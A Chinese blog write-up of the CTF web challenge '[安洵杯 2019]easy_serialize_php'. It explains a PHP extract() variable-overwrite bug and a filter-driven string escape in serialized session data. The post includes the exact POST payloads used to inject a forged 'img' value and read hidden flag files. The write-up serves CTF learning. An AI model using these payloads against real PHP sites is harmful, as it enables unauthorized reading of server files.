[安洵杯 2019]easy_serialize_php

最新推荐文章于 2024-03-11 12:36:05 发布
最新推荐文章于 2024-03-11 12:36:05 发布
阅读量3.8k 收藏 12
点赞数 23
分类专栏: CTF 文章标签: web 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43622442/article/details/106003691
版权

[安洵杯 2019]easy_serialize_php

(因为格式很乱,不会整,每次都存了好几篇- -)

1.打开网站,看到源码,先看中间有个extract函数

(明明学过,又整忘记了= =。)

extract函数:将变量从数组中导入当前的符号表,这里就是把post数组里的取出来变成php变量,就比如我们post传a=123,那它经过这个函数就变成了$a=123。而且它默认在变量名冲突的时候进行覆盖,这就导致了变量覆盖漏洞。

在这里插入图片描述
2.这一大串就是给session初始化:
在这里插入图片描述
3.下面把session序列化了然后调用filter函数:
在这里插入图片描述
4.filter函数就是正则匹配 /php|flag|php5|php4|fl1g/i 替换为空
在这里插入图片描述
5.最后面有个提示,我们先给f传参为phpinfo:(因为$function没有经过过滤函数,所以phpinfo直接传)
在这里插入图片描述
6.直接搜一些敏感点,fopen、disable_、root等等。第二行看到了独特的文件名。(还好和这些敏感点隔得近,不然我还真的不会去找= =)
在这里插入图片描述
7.拿到文件名有什么用呢?访问不出来,看到之前的源代码最后有file_get_contents函数,肯定就是要我们读取这个文件了。

在这里插入图片描述
8.读取是有前提的,$function我们可以通过 $f 直接赋值,么的影响。

现在我们就要base64_decode($userinfo[‘img’])=d0g3_f1ag.php。

那么就要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==。

而$userinfo又是通过$serialize_info反序列化来的。

$serialize_info又是通过session序列化之后再过滤得来的。
在这里插入图片描述
session里面的img在这里赋值,我们指定的话会被sha1哈希,到时候就不能被base64解密了。这里就到了一个难点了。
在这里插入图片描述

9.我们看到上面的过滤函数,会把一些长度的字符替换为0,这个和之前做过的这个题有异曲同工之处[0CTF 2016]piapiapia WP(详细),不过之前的那个题是变长,这个是变短。

10.直接看payload分析比较容易理解:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

因为有变量覆盖漏洞,所以它可以直接这样被赋值进去。

然后session被序列化之后会变成这样:(方头括号我自己加的,方便看的清楚,括号里是我们传的变量值)

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:68:"【a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

然后这串字符串经过过滤函数之后,会变成:

a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"【a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

可以看到,24后面的6个flag被替换为空了,但是指定的长度还是24,怎么办呢?它会往后吞,不管什么符号,都吞掉24个字符。吞完之后变成了这样。

a:3:{s:4:"user";s:24:"【";s:8:"function";s:68:"a】";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

看,括号里的字符串就变成了user的值,这时候我们自己输入的function参数和img参数,就把真的参数替代掉了,假猴子替换了真猴子。

注意格式,我看别人的WP没有function参数也是可以的,但是必须要凑够3个参数,因为一开始序列化的时候指定了有3个参数 。

get传 f=show_image,
post传:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

在这里插入图片描述
查看源代码发现了新的文件,不能直接打开,给它进行base64编码(编码的时候 “/” 也要一起带进去),然后替换掉img的值,计算一下长度,都是20,那不用改长度了。

所以我最后的结果是:
get传 f=show_image,
post传:

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

在这里插入图片描述

【希望自己每次做题,即使看了WP,也要做出不一样的答案或者自己的理解】

H9_dawn
关注
  • 23
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
ts_serialize:零依赖库,用于序列化数据
05-19
:bowl_with_spoon: ts_serialize 零依赖库,用于序列化数据。 ts_serialize可以帮助您: 将camelCase类成员转换为snake_case JSON属性以与REST API一起使用 从REST API有效负载中排除内部字段 将数据类型转换为内部格式,例如: Date的 支持的序列化类型 建于 天野 :sauropod: 贡献 我们提供了资源来帮助您请求新功能或报告并修复错误。 CONTRIBUTING.md-有关请求功能或报告错误或打开请求请求的指导原则 DEVELOPMENT.md-有关设置环境和运行测试套件的说明 CODE_OF_CONDUCT.md-用于社区准则 版本控制 我们使用SemVer进行版本控制。 作者 斯科特·哈迪( Scott Hardy) -初始工作- @shardyMBAI :frog: Chris Dufour-初始工作- @ChrisDufourMB :pizza: :cat_face:
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
使用 MFC 串行化数据和 C++ 对象,三个简单的例子程序
[安洵 2019]easy_web
最新发布
人若无名,便可专心练剑
03-11 1206
但是我们发现这个url有传参,而且在url中,发现img这个位置存在一串字符串,看着像是base64编码的,我就尝试着base64解码,发现这个字符串是利用两次base64编码然后再利用一次hex编码,经过解码得到555.png,那么我们到这里就可以想着,要是可以拿到index.php的源代码,那么我们再进行代码审计,查看下有什么线索没有。我们利用burp抓包,然后再按一次先hex编码,然后再两次base64编码,然后修改img的值,然后利用img读取index.php的源代码。
jquery.serialize() 函数语法及简单实例
10-21
下面小编就为大家带来一篇jquery.serialize() 函数语法及简单实例。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=. ex) protoc -I . proto/metric.proto --go_out=.
jQuery ajax serialize() 方法使用示例
10-25
serialize() 方法创建以标准 URL 编码表示的文本字符串,下面为大家介绍下jQuery serialize方法的使用
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 2999
[安洵 2019]easy_serialize_php 反序列化
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 405
buuctf[安洵 2019]easy_serialize_php
jQuery-serialize()输出序列化form表单值的方法
10-27
jQuery-serialize()输出序列化表单值在工作中很常见也很实用,于是本人搜集整理了一些,需要了解的朋友可以详细参考下
JQuery中serialize() 序列化
10-24
主要介绍了JQuery中serialize() 序列化,十分的细致全面,推荐给大家,
form-serialize
05-16
形式序列化 将表单序列化为JSON。 受dominicbarnes / form-serialize的大力启发,但可与npm一起使用,并且本身不包含transform功能。 用法 serialize ( form ) == // {username: 'user1', password: 'my password'} < input name =' username ' > < input name =' password ' > 对于嵌套的对象/数组字段,请参阅dominicbarnes / square以了解如何完成此操作。
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
se_mouz_image.rar_serialize_序列化
09-23
实现利用serialize()函数序列化文档和鼠标画一些简单的图形的功能.
[BJDCTF2020]Easy MD5(详细)
热门推荐
qq_43622442的博客
04-21 1万+
[BJDCTF2020]Easy MD5(详细) 这一题也是挺多知识点的。 1.打开网站,发现输入啥都没变化: 2.看到响应头有提示,应该是绕过md5进行注入了: 3.这里有个很离谱的点,我是真的没想到:          md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。也就是说会返...
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞)
qq_43622442的博客
05-04 7840
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞) 这几天被学生机折磨死了,第一次用好多不熟练,刷个题压压惊。 1.拿到网站,发现所有的超链接都是指向自己的:(两种答案都在最后) 2.扫描目录找到 .git 泄露: (做ctf题要习惯用dirsearch,而且要调低线程): dirsearch.py -u url -e * --timeout=2 -t 1 ...
easy_serialize_php
03-16
easy_serialize_php 是一个 PHP 库,用于将 PHP 对象序列化为字符串,以便在不同的应用程序之间传输和存储。它提供了一种简单的方法来序列化和反序列化 PHP 对象,使得数据传输和存储变得更加方便和高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值